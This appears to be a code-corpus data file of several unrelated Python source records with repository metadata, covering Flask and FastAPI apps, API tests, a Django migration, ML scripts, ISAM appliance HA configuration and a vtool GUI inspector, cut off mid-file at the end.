app.add_url_rule('/api/v1/category/search', view_func=category_search_view) from app.v1.views.recipe_views import recipe_view, recipe_specific_view, recipe_search_view app.add_url_rule('/api/v1/recipe/<int:category_id>/', view_func=recipe_view) app.add_url_rule('/api/v1/recipe/<int:category_id>/<int:recipe_id>', view_func= \ recipe_specific_view) app.add_url_rule('/api/v1/recipe/<int:category_id>/search', view_func=recipe_search_view) return app
true
true
f728decc932ad7aa29280e8e97286815f1eb87a0
3,230
py
Python
app/tests/v1/test_meetup.py
BILLthebuilder/meetup-query
0c2ab5b3d8c9b97518e047f2e6030eea49916371
[ "MIT" ]
null
null
null
app/tests/v1/test_meetup.py
BILLthebuilder/meetup-query
0c2ab5b3d8c9b97518e047f2e6030eea49916371
[ "MIT" ]
2
2019-01-09T08:19:47.000Z
2019-01-15T03:42:32.000Z
app/tests/v1/test_meetup.py
BILLthebuilder/meetup-query
0c2ab5b3d8c9b97518e047f2e6030eea49916371
[ "MIT" ]
null
null
null
# # Third party imports # import unittest # import json # # Local imports # from app import create_app # class TestMeetups(unittest.TestCase): # def setUp(self): # self.app = create_app("testing") # self.client = self.app.test_client() # self.meetup_incomplete ={ # "topic" : "Programming" # } # self.meetup_complete ={ # "id": "1", # "topic" : "Udacity welcom", # "location" : "San Fransisco or remotely via zoom", # "happeningOn" : "Tommorow" # } # # Test validity of json data in request # def test_post_meetup(self): # response = self.client.post('api/v1/meetups') # result = json.loads(response.data) # self.assertEqual(result["message"],"Only Application/JSON input expected") # self.assertEqual(response.status_code, 400) # # Test empty fields # def test_post_empty_meetup(self): # response = self.client.post('api/v1/meetups',data=json.dumps(self.meetup_incomplete), # content_type="application/json") # result = json.loads(response.data) # self.assertEqual(result["message"],"All fields must be populated with data") # self.assertEqual(response.status_code, 400) # # Test valid input for meetup creation # def test_post_meetup_success(self): # response = self.client.post('api/v1/meetups', data=json.dumps(self.meetup_complete), # content_type="application/json") # result = json.loads(response.data) # self.assertEqual(result["message"],"Meetup created succesfully") # self.assertEqual(response.status_code, 201) import unittest import json from app import create_app class TestMeetups(unittest.TestCase): def setUp(self): self.app = create_app("testing") self.client = self.app.test_client() def create_record(self): response = self.client.post('/api/v1/meetups', data=json.dumps({ "title": "Football", "description": "Playing football on 25th", "date": "25th of November", "location": "Kasarani" }), headers={"content-type": "application/json"}) return response # Test meetups creation def test_01_post_meetups(self): response = self.create_record() self.assertEqual(response.status_code, 201) # Test for fetching all meetup records def test_02_get_all(self): response = self.client.get('/api/v1/meetups', headers={"content-type": "application/json"}) self.assertEqual(response.status_code, 200) # Test for getting a specific meetup record def test_03_get_specific(self): self.create_record() response = self.client.get('/api/v1/meetups/1', headers={"content-type": "application/json"}) self.assertEqual(response.status_code, 200) self.assertNotEqual(response.status_code, 404)
36.292135
95
0.580186
TestCase): def setUp(self): self.app = create_app("testing") self.client = self.app.test_client() def create_record(self): response = self.client.post('/api/v1/meetups', data=json.dumps({ "title": "Football", "description": "Playing football on 25th", "date": "25th of November", "location": "Kasarani" }), headers={"content-type": "application/json"}) return response def test_01_post_meetups(self): response = self.create_record() self.assertEqual(response.status_code, 201) def test_02_get_all(self): response = self.client.get('/api/v1/meetups', headers={"content-type": "application/json"}) self.assertEqual(response.status_code, 200) def test_03_get_specific(self): self.create_record() response = self.client.get('/api/v1/meetups/1', headers={"content-type": "application/json"}) self.assertEqual(response.status_code, 200) self.assertNotEqual(response.status_code, 404)
true
true
f728df115e09cdf67172d2fb6c3518a298f4ff9c
156
py
Python
sqla_wrapper/version.py
gustavopp93/sqla-wrapper
4e30534b67ebe83b40a95e1e3f342b132fedb6a6
[ "Apache-2.0" ]
null
null
null
sqla_wrapper/version.py
gustavopp93/sqla-wrapper
4e30534b67ebe83b40a95e1e3f342b132fedb6a6
[ "Apache-2.0" ]
null
null
null
sqla_wrapper/version.py
gustavopp93/sqla-wrapper
4e30534b67ebe83b40a95e1e3f342b132fedb6a6
[ "Apache-2.0" ]
null
null
null
import pkg_resources try: __version__ = pkg_resources.require("sqla-wrapper")[0].version except Exception: # pragma: no cover __version__ = None
19.5
66
0.737179
import pkg_resources try: __version__ = pkg_resources.require("sqla-wrapper")[0].version except Exception: __version__ = None
true
true
f728df9e68bfc20a2756b0819774695d041fcdb0
610
py
Python
test_summary_index.py
derenlei/bert-extractive-summarizer
64f73851d541bab40e62f09c799cbd7cce70cc69
[ "MIT" ]
null
null
null
test_summary_index.py
derenlei/bert-extractive-summarizer
64f73851d541bab40e62f09c799cbd7cce70cc69
[ "MIT" ]
null
null
null
test_summary_index.py
derenlei/bert-extractive-summarizer
64f73851d541bab40e62f09c799cbd7cce70cc69
[ "MIT" ]
1
2021-02-15T07:07:10.000Z
2021-02-15T07:07:10.000Z
from summarizer import Summarizer from transformers import AutoConfig, AutoTokenizer, AutoModel test_file = 'tests/test_news_source.txt' model_spec = "distilbert-base-uncased" f = open(test_file, 'r') body = f.read() f.close() custom_config = AutoConfig.from_pretrained(model_spec) custom_config.output_hidden_states=True custom_tokenizer = AutoTokenizer.from_pretrained(model_spec) custom_model = AutoModel.from_pretrained(model_spec, config=custom_config) model = Summarizer(custom_model=custom_model, return_list=True, return_index=True) result, index = model(body) print('\n'.join(result)) print(index)
32.105263
82
0.816393
from summarizer import Summarizer from transformers import AutoConfig, AutoTokenizer, AutoModel test_file = 'tests/test_news_source.txt' model_spec = "distilbert-base-uncased" f = open(test_file, 'r') body = f.read() f.close() custom_config = AutoConfig.from_pretrained(model_spec) custom_config.output_hidden_states=True custom_tokenizer = AutoTokenizer.from_pretrained(model_spec) custom_model = AutoModel.from_pretrained(model_spec, config=custom_config) model = Summarizer(custom_model=custom_model, return_list=True, return_index=True) result, index = model(body) print('\n'.join(result)) print(index)
true
true
f728e0077701397b6084ad1b88f21a79f54414ab
403
py
Python
app/run/migrations/0006_alter_run_start_time.py
Masado/django-app-api-3
88def27f1cd8974c62dead282cd04d1384054888
[ "MIT" ]
null
null
null
app/run/migrations/0006_alter_run_start_time.py
Masado/django-app-api-3
88def27f1cd8974c62dead282cd04d1384054888
[ "MIT" ]
null
null
null
app/run/migrations/0006_alter_run_start_time.py
Masado/django-app-api-3
88def27f1cd8974c62dead282cd04d1384054888
[ "MIT" ]
null
null
null
# Generated by Django 3.2.9 on 2021-11-17 15:36 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('run', '0005_alter_run_start_time'), ] operations = [ migrations.AlterField( model_name='run', name='start_time', field=models.DateTimeField(verbose_name='date started'), ), ]
21.210526
68
0.60794
from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('run', '0005_alter_run_start_time'), ] operations = [ migrations.AlterField( model_name='run', name='start_time', field=models.DateTimeField(verbose_name='date started'), ), ]
true
true
f728e0dcd96c1b591ae5e8c1c0aaa544cd603765
393
py
Python
MyMusicApp/users/migrations/0002_profile_bio.py
kells4real/MusicApp
4e4ba065c4f472243413551f63dc4e9eddf7f4a7
[ "bzip2-1.0.6", "MIT" ]
null
null
null
MyMusicApp/users/migrations/0002_profile_bio.py
kells4real/MusicApp
4e4ba065c4f472243413551f63dc4e9eddf7f4a7
[ "bzip2-1.0.6", "MIT" ]
null
null
null
MyMusicApp/users/migrations/0002_profile_bio.py
kells4real/MusicApp
4e4ba065c4f472243413551f63dc4e9eddf7f4a7
[ "bzip2-1.0.6", "MIT" ]
null
null
null
# Generated by Django 2.2.2 on 2019-09-13 23:27 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ] operations = [ migrations.AddField( model_name='profile', name='bio', field=models.TextField(blank=True, max_length=500, null=True), ), ]
20.684211
74
0.590331
from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ] operations = [ migrations.AddField( model_name='profile', name='bio', field=models.TextField(blank=True, max_length=500, null=True), ), ]
true
true
f728e12d20caee0ee30c4eb3f34608b8cca21f80
1,896
py
Python
backend/app.py
eaglesemanation/CyberGarden-HackPlatform
e7bb9f7433644d3ba38c76a35595c798a30c0883
[ "MIT" ]
null
null
null
backend/app.py
eaglesemanation/CyberGarden-HackPlatform
e7bb9f7433644d3ba38c76a35595c798a30c0883
[ "MIT" ]
null
null
null
backend/app.py
eaglesemanation/CyberGarden-HackPlatform
e7bb9f7433644d3ba38c76a35595c798a30c0883
[ "MIT" ]
null
null
null
#!/usr/bin/env python import shutil from pathlib import Path import uvicorn from fastapi import FastAPI from starlette.middleware.cors import CORSMiddleware from settings import PROD_TORTOISE_ORM, TEST_TORTOISE_ORM from tortoise import Tortoise from crud import hacks, locations, participants, teams, users from settings import PROD_TORTOISE_ORM from tools.db import fill_db # from backend.tools.db import fill_db from tools.db import fill_db from crud import users, hacks, teams, locations app = FastAPI( version="0.0.2", title="CyberGarden-HackPlatform", description="CyberGarden Hackathon project API based on FastAPI", ) app.add_middleware( CORSMiddleware, allow_origins=["*"], allow_credentials=True, allow_methods=["*"], allow_headers=["*"], ) app.include_router(users.router, prefix="/users", tags=["Users"]) app.include_router(participants.router, prefix="/participants", tags=["Participants"]) app.include_router(hacks.router, prefix="/hacks", tags=["Hacks"]) app.include_router(teams.router, prefix="/teams", tags=["Teams"]) app.include_router(locations.router, prefix="/locations", tags=["Locations"]) try: shutil.rmtree( "db/test" ) # Удаляем папку с тестовой базой данных при запуске и импорте except FileNotFoundError: print("Error during delete") pass for path in ["db/test"]: Path(path).mkdir(parents=True, exist_ok=True) config_var = PROD_TORTOISE_ORM # config_var = TEST_TORTOISE_ORM for path in ["db/test", "db/prod"]: Path(path).mkdir(parents=True, exist_ok=True) @app.on_event("startup") async def startup(): await Tortoise.init(config=config_var) await Tortoise.generate_schemas(safe=True) await fill_db() @app.on_event("shutdown") async def shutdown(): await Tortoise.close_connections() if __name__ == "__main__": uvicorn.run("app:app", reload=True, use_colors=True)
25.28
86
0.737869
import shutil from pathlib import Path import uvicorn from fastapi import FastAPI from starlette.middleware.cors import CORSMiddleware from settings import PROD_TORTOISE_ORM, TEST_TORTOISE_ORM from tortoise import Tortoise from crud import hacks, locations, participants, teams, users from settings import PROD_TORTOISE_ORM from tools.db import fill_db from tools.db import fill_db from crud import users, hacks, teams, locations app = FastAPI( version="0.0.2", title="CyberGarden-HackPlatform", description="CyberGarden Hackathon project API based on FastAPI", ) app.add_middleware( CORSMiddleware, allow_origins=["*"], allow_credentials=True, allow_methods=["*"], allow_headers=["*"], ) app.include_router(users.router, prefix="/users", tags=["Users"]) app.include_router(participants.router, prefix="/participants", tags=["Participants"]) app.include_router(hacks.router, prefix="/hacks", tags=["Hacks"]) app.include_router(teams.router, prefix="/teams", tags=["Teams"]) app.include_router(locations.router, prefix="/locations", tags=["Locations"]) try: shutil.rmtree( "db/test" ) except FileNotFoundError: print("Error during delete") pass for path in ["db/test"]: Path(path).mkdir(parents=True, exist_ok=True) config_var = PROD_TORTOISE_ORM for path in ["db/test", "db/prod"]: Path(path).mkdir(parents=True, exist_ok=True) @app.on_event("startup") async def startup(): await Tortoise.init(config=config_var) await Tortoise.generate_schemas(safe=True) await fill_db() @app.on_event("shutdown") async def shutdown(): await Tortoise.close_connections() if __name__ == "__main__": uvicorn.run("app:app", reload=True, use_colors=True)
true
true
f728e28fd3d47867ca96ea9647907f197fd83ece
1,001
py
Python
logistic regression/logistic_adam/adam_train_loss .py
ouyangyike/Inference-Algorithm
ac3470e2fbc4415174b32ecc2e2f3f101da1ca38
[ "MIT" ]
null
null
null
logistic regression/logistic_adam/adam_train_loss .py
ouyangyike/Inference-Algorithm
ac3470e2fbc4415174b32ecc2e2f3f101da1ca38
[ "MIT" ]
null
null
null
logistic regression/logistic_adam/adam_train_loss .py
ouyangyike/Inference-Algorithm
ac3470e2fbc4415174b32ecc2e2f3f101da1ca38
[ "MIT" ]
null
null
null
import numpy as np import tensorflow as tf import matplotlib.pyplot as plt from logistic_adam import * #learing rate = 1,batch_size = 500, epoch=15, lamda = 0.01 logging = runLogistic(1,500,15,0.01) #print(logging) plt.plot(logging[:,0],marker='+',label='learning rate = 1') #learing rate = 0.1,batch_size = 500, epoch=15, lamda = 0.01 logging = runLogistic(0.1,500,15,0.01) #print(logging) plt.plot(logging[:,0],marker='*',label='learning rate = 0.1') #learing rate = 0.01,batch_size = 500, epoch=15, lamda = 0.01 logging = runLogistic(0.01,500,15,0.01) #print(logging) plt.plot(logging[:,0],marker='h',label='learning rate = 0.01') #learing rate = 0.001,batch_size = 500, epoch=15, lamda = 0.01 logging = runLogistic(0.001,500,15,0.01) #print(logging) plt.plot(logging[:,0],marker='d',label='learning rate = 0.001') plt.legend(loc='upper right') plt.title('Plot of Train_CrossEntropy vs. Iterations with batch_size=500') plt.xlabel('Iterations') plt.ylabel('Train_CrossEntropy') plt.show()
28.6
74
0.712288
import numpy as np import tensorflow as tf import matplotlib.pyplot as plt from logistic_adam import * logging = runLogistic(1,500,15,0.01) plt.plot(logging[:,0],marker='+',label='learning rate = 1') logging = runLogistic(0.1,500,15,0.01) plt.plot(logging[:,0],marker='*',label='learning rate = 0.1') logging = runLogistic(0.01,500,15,0.01) plt.plot(logging[:,0],marker='h',label='learning rate = 0.01') logging = runLogistic(0.001,500,15,0.01) plt.plot(logging[:,0],marker='d',label='learning rate = 0.001') plt.legend(loc='upper right') plt.title('Plot of Train_CrossEntropy vs. Iterations with batch_size=500') plt.xlabel('Iterations') plt.ylabel('Train_CrossEntropy') plt.show()
true
true
f728e2a3b8c71f6b3b84c50cab4c2551ffed73f2
5,983
py
Python
ibmsecurity/isam/base/network/felb/ha.py
zone-zero/ibmsecurity
7d3e38104b67e1b267e18a44845cb756a5302c3d
[ "Apache-2.0" ]
46
2017-03-21T21:08:59.000Z
2022-02-20T22:03:46.000Z
ibmsecurity/isam/base/network/felb/ha.py
zone-zero/ibmsecurity
7d3e38104b67e1b267e18a44845cb756a5302c3d
[ "Apache-2.0" ]
201
2017-03-21T21:25:52.000Z
2022-03-30T21:38:20.000Z
ibmsecurity/isam/base/network/felb/ha.py
zone-zero/ibmsecurity
7d3e38104b67e1b267e18a44845cb756a5302c3d
[ "Apache-2.0" ]
91
2017-03-22T16:25:36.000Z
2022-02-04T04:36:29.000Z
import ibmsecurity.utilities.tools import logging from ibmsecurity.utilities import tools logger = logging.getLogger(__name__) module_uri = "/isam/felb/configuration/ha" requires_modules = None requires_version = None requires_model = "Appliance" def get(isamAppliance, check_mode=False, force=False): """ Retrieving HA configuration """ return isamAppliance.invoke_get("Retrieving HA configuration", module_uri, requires_version=requires_version, requires_modules=requires_modules, requires_model=requires_model) def disable(isamAppliance, check_mode=False, force=False): """ Disabling HA """ check_value, warnings = _check_enable(isamAppliance) if force is True or check_value is True: if check_mode is True: return isamAppliance.create_return_object(changed=True, warnings=warnings) else: return isamAppliance.invoke_delete("Disabling HA", module_uri, requires_version=requires_version, requires_modules=requires_modules, requires_model=requires_model) else: return isamAppliance.create_return_object(warnings=warnings) def enable(isamAppliance, is_primary, interface, remote, port, health_check_interval, health_check_timeout, check_mode=False, force=False): """ Enabling HA """ json_data = { "is_primary": is_primary, "interface": interface, "remote": remote, "port": port, "health_check_interval": health_check_interval, "health_check_timeout": health_check_timeout } check_value, warnings = _check_enable(isamAppliance) if force is True or check_value is False: if check_mode is True: return isamAppliance.create_return_object(changed=True, warnings=warnings) else: return isamAppliance.invoke_post("Enabling HA", module_uri, json_data, requires_version=requires_version, requires_modules=requires_modules, requires_model=requires_model) else: return isamAppliance.create_return_object(warnings=warnings) def update(isamAppliance, is_primary, interface, remote, port, health_check_interval, health_check_timeout, check_mode=False, force=False): """ Updating HA configuration """ json_data = { "is_primary": is_primary, "interface": interface, "remote": remote, "port": port, "health_check_interval": health_check_interval, "health_check_timeout": health_check_timeout } # Call to check function to see if configuration already exist update_required, warnings = _check_update(isamAppliance, json_data) if force is True or update_required is True: if check_mode is True: return isamAppliance.create_return_object(changed=True, warnigns=warnings) else: return isamAppliance.invoke_put("Updating HA configuration", module_uri, json_data, requires_modules=requires_modules, requires_version=requires_version, requires_model=requires_model) else: return isamAppliance.create_return_object(warnings=warnings) def set(isamAppliance, is_primary, interface, remote, port, health_check_interval, health_check_timeout, check_mode=False, force=False): """ determines if add or update is used. """ is_enabled, warnings = _check_enable(isamAppliance) if is_enabled is False: return enable(isamAppliance, is_primary=is_primary, interface=interface, remote=remote, port=port, health_check_interval=health_check_interval, health_check_timeout=health_check_timeout, check_mode=check_mode, force=force) elif is_enabled is True: return update(isamAppliance, is_primary=is_primary, interface=interface, remote=remote, port=port, health_check_interval=health_check_interval, health_check_timeout=health_check_timeout, check_mode=check_mode, force=force) else: return isamAppliance.create_return_object(warnings=warnings) def _check_update(isamAppliance, json_data): """ idempotency test for each parameter """ ret_obj = get(isamAppliance) warnings = ret_obj['warnings'] if 'enabled' in ret_obj['data']: if ret_obj['data']['enabled'] is False: return False, warnings else: del ret_obj['data']['enabled'] sorted_ret_obj = tools.json_sort(ret_obj['data']) sorted_json_data = tools.json_sort(json_data) logger.debug("Sorted Existing Data:{0}".format(sorted_ret_obj)) logger.debug("Sorted Desired Data:{0}".format(sorted_json_data)) if sorted_ret_obj != sorted_json_data: return True, warnings else: return False, warnings def _check_enable(isamAppliance): """ Checks delete function for idempotency """ check_obj = get(isamAppliance) warnings = check_obj['warnings'] if 'enabled' in check_obj['data']: if check_obj['data']['enabled'] == True: return True, warnings else: return False, warnings else: return None, warnings def compare(isamAppliance1, isamAppliance2): """ Compare FELB HA configuration between two appliances """ ret_obj1 = get(isamAppliance1) ret_obj2 = get(isamAppliance2) return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
34.583815
106
0.638476
import ibmsecurity.utilities.tools import logging from ibmsecurity.utilities import tools logger = logging.getLogger(__name__) module_uri = "/isam/felb/configuration/ha" requires_modules = None requires_version = None requires_model = "Appliance" def get(isamAppliance, check_mode=False, force=False): return isamAppliance.invoke_get("Retrieving HA configuration", module_uri, requires_version=requires_version, requires_modules=requires_modules, requires_model=requires_model) def disable(isamAppliance, check_mode=False, force=False): check_value, warnings = _check_enable(isamAppliance) if force is True or check_value is True: if check_mode is True: return isamAppliance.create_return_object(changed=True, warnings=warnings) else: return isamAppliance.invoke_delete("Disabling HA", module_uri, requires_version=requires_version, requires_modules=requires_modules, requires_model=requires_model) else: return isamAppliance.create_return_object(warnings=warnings) def enable(isamAppliance, is_primary, interface, remote, port, health_check_interval, health_check_timeout, check_mode=False, force=False): json_data = { "is_primary": is_primary, "interface": interface, "remote": remote, "port": port, "health_check_interval": health_check_interval, "health_check_timeout": health_check_timeout } check_value, warnings = _check_enable(isamAppliance) if force is True or check_value is False: if check_mode is True: return isamAppliance.create_return_object(changed=True, warnings=warnings) else: return isamAppliance.invoke_post("Enabling HA", module_uri, json_data, requires_version=requires_version, requires_modules=requires_modules, requires_model=requires_model) else: return isamAppliance.create_return_object(warnings=warnings) def update(isamAppliance, is_primary, interface, remote, port, health_check_interval, health_check_timeout, check_mode=False, force=False): json_data = { "is_primary": is_primary, "interface": interface, "remote": remote, "port": port, "health_check_interval": health_check_interval, "health_check_timeout": health_check_timeout } update_required, warnings = _check_update(isamAppliance, json_data) if force is True or update_required is True: if check_mode is True: return isamAppliance.create_return_object(changed=True, warnigns=warnings) else: return isamAppliance.invoke_put("Updating HA configuration", module_uri, json_data, requires_modules=requires_modules, requires_version=requires_version, requires_model=requires_model) else: return isamAppliance.create_return_object(warnings=warnings) def set(isamAppliance, is_primary, interface, remote, port, health_check_interval, health_check_timeout, check_mode=False, force=False): is_enabled, warnings = _check_enable(isamAppliance) if is_enabled is False: return enable(isamAppliance, is_primary=is_primary, interface=interface, remote=remote, port=port, health_check_interval=health_check_interval, health_check_timeout=health_check_timeout, check_mode=check_mode, force=force) elif is_enabled is True: return update(isamAppliance, is_primary=is_primary, interface=interface, remote=remote, port=port, health_check_interval=health_check_interval, health_check_timeout=health_check_timeout, check_mode=check_mode, force=force) else: return isamAppliance.create_return_object(warnings=warnings) def _check_update(isamAppliance, json_data): ret_obj = get(isamAppliance) warnings = ret_obj['warnings'] if 'enabled' in ret_obj['data']: if ret_obj['data']['enabled'] is False: return False, warnings else: del ret_obj['data']['enabled'] sorted_ret_obj = tools.json_sort(ret_obj['data']) sorted_json_data = tools.json_sort(json_data) logger.debug("Sorted Existing Data:{0}".format(sorted_ret_obj)) logger.debug("Sorted Desired Data:{0}".format(sorted_json_data)) if sorted_ret_obj != sorted_json_data: return True, warnings else: return False, warnings def _check_enable(isamAppliance): check_obj = get(isamAppliance) warnings = check_obj['warnings'] if 'enabled' in check_obj['data']: if check_obj['data']['enabled'] == True: return True, warnings else: return False, warnings else: return None, warnings def compare(isamAppliance1, isamAppliance2): ret_obj1 = get(isamAppliance1) ret_obj2 = get(isamAppliance2) return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
true
true
f728e661b01796f02639fa1d1c695a188a1df203
1,684
py
Python
Code/HypoBertClas/pybert/test/predicter.py
NinaTian98369/HypoGen
14f192ecc1ef0c6fc5864f0816ef61885dc9e864
[ "MIT" ]
3
2021-09-21T19:05:30.000Z
2022-02-17T22:14:31.000Z
Code/HypoBertClas/pybert/test/predicter.py
NinaTian98369/HypoGen
14f192ecc1ef0c6fc5864f0816ef61885dc9e864
[ "MIT" ]
2
2021-11-30T06:56:12.000Z
2022-03-11T06:01:59.000Z
Code/HypoBertClas/pybert/test/predicter.py
NinaTian98369/HypoGen
14f192ecc1ef0c6fc5864f0816ef61885dc9e864
[ "MIT" ]
1
2022-02-17T22:08:13.000Z
2022-02-17T22:08:13.000Z
#encoding:utf-8 import torch import numpy as np from ..utils.utils import model_device,load_bert class Predicter(object): def __init__(self, model, logger, n_gpu, model_path ): self.model = model self.logger = logger self.width = 30 self.model, self.device = model_device(n_gpu= n_gpu, model=self.model, logger=self.logger) loads = load_bert(model_path=model_path,model = self.model) self.model = loads[0] def show_info(self,batch_id,n_batch): recv_per = int(100 * (batch_id + 1) / n_batch) if recv_per >= 100: recv_per = 100 # show bar show_bar = f"\r[predict]{batch_id+1}/{n_batch}[{int(self.width * recv_per / 100) * '>':<{self.width}s}]{recv_per}%" print(show_bar,end='') def predict(self,data): all_logits = None self.model.eval() n_batch = len(data) with torch.no_grad(): for step, (input_ids, input_mask, segment_ids, label_ids) in enumerate(data): input_ids = input_ids.to(self.device) input_mask = input_mask.to(self.device) segment_ids = segment_ids.to(self.device) logits = self.model(input_ids, segment_ids, input_mask) logits = logits.sigmoid() self.show_info(step,n_batch) if all_logits is None: all_logits = logits.detach().cpu().numpy() else: all_logits = np.concatenate([all_logits,logits.detach().cpu().numpy()],axis = 0) return all_logits
33.019608
123
0.559976
import torch import numpy as np from ..utils.utils import model_device,load_bert class Predicter(object): def __init__(self, model, logger, n_gpu, model_path ): self.model = model self.logger = logger self.width = 30 self.model, self.device = model_device(n_gpu= n_gpu, model=self.model, logger=self.logger) loads = load_bert(model_path=model_path,model = self.model) self.model = loads[0] def show_info(self,batch_id,n_batch): recv_per = int(100 * (batch_id + 1) / n_batch) if recv_per >= 100: recv_per = 100 show_bar = f"\r[predict]{batch_id+1}/{n_batch}[{int(self.width * recv_per / 100) * '>':<{self.width}s}]{recv_per}%" print(show_bar,end='') def predict(self,data): all_logits = None self.model.eval() n_batch = len(data) with torch.no_grad(): for step, (input_ids, input_mask, segment_ids, label_ids) in enumerate(data): input_ids = input_ids.to(self.device) input_mask = input_mask.to(self.device) segment_ids = segment_ids.to(self.device) logits = self.model(input_ids, segment_ids, input_mask) logits = logits.sigmoid() self.show_info(step,n_batch) if all_logits is None: all_logits = logits.detach().cpu().numpy() else: all_logits = np.concatenate([all_logits,logits.detach().cpu().numpy()],axis = 0) return all_logits
true
true
f728e80f740d63b4f91fffd0267a79fc4be81c99
304
py
Python
pyro/nn/__init__.py
HeyangGong/Pyro4CI
28778477ce8ff3bc12b3ac8face2208e5b05ff7c
[ "MIT" ]
2
2020-04-11T04:30:55.000Z
2021-07-29T18:45:08.000Z
pyro/nn/__init__.py
HeyangGong/Pyro4CI
28778477ce8ff3bc12b3ac8face2208e5b05ff7c
[ "MIT" ]
null
null
null
pyro/nn/__init__.py
HeyangGong/Pyro4CI
28778477ce8ff3bc12b3ac8face2208e5b05ff7c
[ "MIT" ]
null
null
null
from __future__ import absolute_import, division, print_function from pyro.nn.auto_reg_nn import AutoRegressiveNN, ConditionalAutoRegressiveNN, MaskedLinear from pyro.nn.dense_nn import DenseNN __all__ = [ "AutoRegressiveNN", "ConditionalAutoRegressiveNN", "DenseNN", "MaskedLinear", ]
25.333333
91
0.786184
from __future__ import absolute_import, division, print_function from pyro.nn.auto_reg_nn import AutoRegressiveNN, ConditionalAutoRegressiveNN, MaskedLinear from pyro.nn.dense_nn import DenseNN __all__ = [ "AutoRegressiveNN", "ConditionalAutoRegressiveNN", "DenseNN", "MaskedLinear", ]
true
true
f728e89cc7e4fbbc18c7a515a87b73a0c5779a76
13,317
py
Python
vtool/inspect_matches.py
WildMeOrg/wbia-vtool
a9c7e2649c625b26eb074766c1d9018f432a33c6
[ "Apache-2.0" ]
1
2017-05-13T14:06:15.000Z
2017-05-13T14:06:15.000Z
vtool/inspect_matches.py
WildbookOrg/vtool
a9c7e2649c625b26eb074766c1d9018f432a33c6
[ "Apache-2.0" ]
4
2020-06-23T19:02:46.000Z
2020-10-13T00:48:32.000Z
vtool/inspect_matches.py
WildbookOrg/vtool
a9c7e2649c625b26eb074766c1d9018f432a33c6
[ "Apache-2.0" ]
1
2020-06-29T03:42:39.000Z
2020-06-29T03:42:39.000Z
# -*- coding: utf-8 -*- from __future__ import absolute_import, division, print_function import utool as ut import ubelt as ub try: import wbia.guitool as gt from wbia.guitool import mpl_widget INSPECT_BASE = gt.GuitoolWidget MatplotlibWidget = mpl_widget.MatplotlibWidget except (ImportError, TypeError): import warnings warnings.warn('WARNING: guitool not available') MatplotlibWidget = object INSPECT_BASE = object def lazy_test_annot(key): import numpy as np rchip_fpath = ut.grab_test_imgpath(key) annot = ut.LazyDict( { 'aid': key.split('.')[0], 'nid': key[0:4], 'rchip_fpath': rchip_fpath, 'gps': (np.nan, np.nan), 'yaw': np.nan, 'view': np.nan, 'qual': np.nan, 'time': np.nan, } ) return annot try: import wbia.dtool MatchDisplayConfig = wbia.dtool.from_param_info_list( [ ut.ParamInfo('overlay', True), ut.ParamInfo('show_all_kpts', False), ut.ParamInfo('mask_blend', 0.0, min_=0, max_=1), ut.ParamInfo('heatmask', True, hideif=':not overlay'), ut.ParamInfo('show_homog', False, hideif=':not overlay'), ut.ParamInfo('show_ori', False, hideif=':not overlay'), ut.ParamInfo('show_ell', False, hideif=':not overlay'), ut.ParamInfo('show_pts', False, hideif=':not overlay'), ut.ParamInfo('show_lines', False, hideif=lambda cfg: not cfg['overlay']), ut.ParamInfo('show_rect', False, hideif=':not overlay'), ut.ParamInfo('show_eig', False, hideif=':not overlay'), ut.ParamInfo('ell_alpha', 0.6, min_=0, max_=1, hideif=':not overlay'), ut.ParamInfo('line_alpha', 0.35, min_=0, max_=1, hideif=':not overlay'), ] ) except (ImportError, TypeError): pass class MatchInspector(INSPECT_BASE): """ A widget that contains (1) a viewport that displays an annotation pair with matches overlayed. (2) a control panel for tuning matching parameters (3) a text area displaying information about the match vector CommandLine: python -m vtool.inspect_matches MatchInspector:0 --show python -m vtool.inspect_matches MatchInspector:1 --show python -m vtool.inspect_matches MatchInspector:1 --db GZ_Master1 --aids=1041,1045 --show Example: >>> # SCRIPT >>> from vtool.inspect_matches import * # NOQA >>> import vtool as vt >>> gt.ensure_qapp() >>> ut.qtensure() >>> annot1 = lazy_test_annot('easy1.png') >>> annot2 = lazy_test_annot('easy2.png') >>> match = vt.PairwiseMatch(annot1, annot2) >>> self = MatchInspector(match=match) >>> self.show() >>> # xdoctest: +REQUIRES(--show) >>> #self.update() >>> gt.qtapp_loop(qwin=self, freq=10) Example: >>> # SCRIPT >>> from vtool.inspect_matches import * # NOQA >>> import vtool as vt >>> import wbia >>> gt.ensure_qapp() >>> ut.qtensure() >>> ibs = wbia.opendb(defaultdb='PZ_MTEST') >>> aids = ub.argval('--aids', default=[1, 2]) >>> print('aids = %r' % (aids,)) >>> annots = ibs.annots(aids) >>> annot1 = annots[0]._make_lazy_dict() >>> annot2 = annots[1]._make_lazy_dict() >>> cfgdict = MatchDisplayConfig().asdict() >>> cfgdict = ut.argparse_dict(cfgdict) >>> match = vt.PairwiseMatch(annot1, annot2) >>> self = MatchInspector(match=match, cfgdict=cfgdict) >>> self.show() >>> # xdoctest: +REQUIRES(--show) >>> #self.update() >>> gt.qtapp_loop(qwin=self, freq=10) """ def showEvent(self, event): super(MatchInspector, self).showEvent(event) # Fire initialize event after we show the GUI # QtCore.QTimer.singleShot(50, self.init_inference) self.first_show() def first_show(self, state=None): if self.match is not None: # Show the match if updating is on, otherwise just draw the annot # pair if self.autoupdate_cb.checkState(): self.update() else: self.draw_pair() def set_match(self, match=None, on_context=None, info_text=None): self.match = match self.info_text = info_text self.on_context = on_context if self.isVisible(): self.first_show() def initialize( self, match=None, on_context=None, autoupdate=True, info_text=None, cfgdict=None ): from wbia.plottool import abstract_interaction from wbia.guitool.__PYQT__ import QtCore self.set_match(match, on_context, info_text) self._setup_configs(cfgdict=cfgdict) self._setup_layout(autoupdate=autoupdate) abstract_interaction.register_interaction(self) self.setContextMenuPolicy(QtCore.Qt.CustomContextMenu) self.customContextMenuRequested.connect(self.execContextMenu) def execContextMenu(self, qpoint): if self.on_context: options = self.on_context() else: options = [('No context set', None)] gt.popup_menu(self, qpoint, options) def screenshot(self): import wbia.plottool as pt with pt.RenderingContext() as render: self.match.show(**self.disp_config) fpaths = gt.newFileDialog('.', mode='save', exec_=True) if fpaths is not None and 